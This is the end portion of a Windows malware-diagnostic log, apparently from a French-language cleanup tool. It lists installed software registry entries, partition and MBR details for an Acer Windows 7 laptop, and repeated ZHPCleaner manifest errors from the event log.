[HKCR\Installer\Products\807E9EB00CD53694C9DFA05A9190E097] : Junk Mail filter update
[HKCR\Installer\Products\814925F7D44329737F6B40BE08F59513] : CCC Help English -> C:\Windows\Installer\{7F529418-344D-3792-F7B6-04EB805F5931}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\824E109519CEEE17AB6549714EB01E28] : ccc-core-static -> C:\Windows\Installer\{5901E428-EC91-71EE-BA56-9417E40BE182}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\8CDD41E806AE81E43B3E917301D4B5AD] : MSVCRT110
[HKCR\Installer\Products\97B46AE91A03E25F8D100BC70FF5FFFA] : ccc-utility64 -> C:\Windows\Installer\{9EA64B79-30A1-F52E-D801-B07CF05FFFAF}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A089CE062ADB6BC44A720BA745894BAC] : Google Update Helper
[HKCR\Installer\Products\A185D71E949635A6A7818EC0B6CD8C00] : CCC Help Italian -> C:\Windows\Installer\{E17D581A-6949-6A53-7A18-E80C6BDCC800}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A1967D9FDC3E51FEED83DE0FBBE143F5] : CCC Help Japanese -> C:\Windows\Installer\{F9D7691A-E3CD-EF15-DE38-EDF0BB1E345F}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A1EEE09946D4FA619A44DA79EA80D062] : CCC Help German -> C:\Windows\Installer\{990EEE1A-4D64-16AF-A944-AD97AE080D26}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A6B3D37FF5E4D39E7C3C56ED08EB0E7E] : CCC Help Dutch -> C:\Windows\Installer\{F73D3B6A-4E5F-E93D-C7C3-65DE80BEE0E7}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A6C64DD86500CEF47BA082BB611A1FF1] : MSVCRT
[HKCR\Installer\Products\A8D9AAEA743A4CF0C5FA9D2F32F6FC94] : CCC Help French -> C:\Windows\Installer\{AEAA9D8A-A347-0FC4-5CAF-D9F2236FCF49}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\B13089A9A1A0CDFA784FAADF1C9EB7D7] : CCC Help Portuguese -> C:\Windows\Installer\{9A98031B-0A1A-AFDC-87F4-AAFDC1E97B7D}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\B4EB76DD26E75124FA3A1F328A003A98] : Movie Maker
[HKCR\Installer\Products\B9FB157332F56794AA26B14F7D19CDEF] : Photo Common
[HKCR\Installer\Products\BAB45323EAB89817E6F329D27492D2D3] : CCC Help Czech -> C:\Windows\Installer\{32354BAB-8BAE-7189-6E3F-922D47292D3D}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C24530772483EE5C42250B604F141A26] : CCC Help Polish -> C:\Windows\Installer\{7703542C-3842-C5EE-2452-B006F441A162}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C34EA4824E03E75B2A435094D650BA86] : Catalyst Control Center Graphics Previews Vista -> C:\Windows\Installer\{284AE43C-30E4-B57E-A234-05496D05AB68}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C82712DB5C2296D2F2254C34E7F80FE2] : Catalyst Control Center InstallProxy -> C:\Windows\Installer\{BD21728C-22C5-2D69-2F52-C4437E8FF02E}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\CB12E5BE65CAD54A55391A5CA5836077] : CCC Help Swedish -> C:\Windows\Installer\{EB5E21BC-AC56-A45D-5593-A1C55A380677}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\DBBF54FE8EC3B896CA446C3964F8353D] : CCC Help Greek -> C:\Windows\Installer\{EF45FBBD-3CE8-698B-AC44-C693468F53D3}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\E66BAA708174D2242981A4BFC329A217] : Photo Gallery
[HKCR\Installer\Products\E998A73F54715F2556F8A9D44A4DB67B] : AMD Catalyst Install Manager -> C:\Windows\Installer\{F37A899E-1745-52F5-658F-9A4DA4D46BB7}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\EB37EE2C37DC9CE65A0AE080A0060AE0] : CCC Help Chinese Standard -> C:\Windows\Installer\{C2EE73BE-CD73-6EC9-A5A0-0E080A60A00E}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\EE5906103BB5C1975A856014F27F6819] : CCC Help Russian -> C:\Windows\Installer\{016095EE-5BB3-791C-A558-06412FF78691}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\F187AF9E08E3993428A5DAE3112CC877] : MSVCRT110_amd64
[HKCR\Installer\Products\F60730A4A66673047777F5728467D401] : Java Auto Updater
[HKCR\Installer\Products\FF43B934E47F70845B2EB4575815ADB6] : Galerie de photos

---------- | ADS


---------- | Drives

 Disk: 0   Size=715G
 Pos MBRndx Type/Name  Size Active Hide Start Sector   Sectors
 --- ------ ---------- ---- ------ ---- ------------ ------------
  0    0    07-NTFS    1.9G   Yes   No         2,048    3,874,816
  1    1    07-NTFS    714G   No    No     3,876,864  461,270,256

---------- | MBR

Windows Version:		Windows 7 Home Premium Edition
Windows Information:		Service Pack 1 (build 7601), 64-bit
Base Board Manufacturer:	Acer
BIOS Manufacturer:		Acer
System Manufacturer:		Acer
System Product Name:		Aspire 5742G
Logical Drives Mask:		0x0001000c

Analysis of file "C:\QuickDiag\MBR.bin":
Windows 7 MBR code detected

64 bits not supported by MBR.exe, Dump : C:\QuickDiag\MBR.Bin

---------- | 20 LastEventLog

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------

La création du contexte d’activation a échoué pour « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Users\Utilisateur\AppData\Roaming\ZHP\ZHPCleaner.exe » à la ligne 0. Syntaxe XML non valide.
------------


----------( EOF)---------- - 3345 | 19:02:30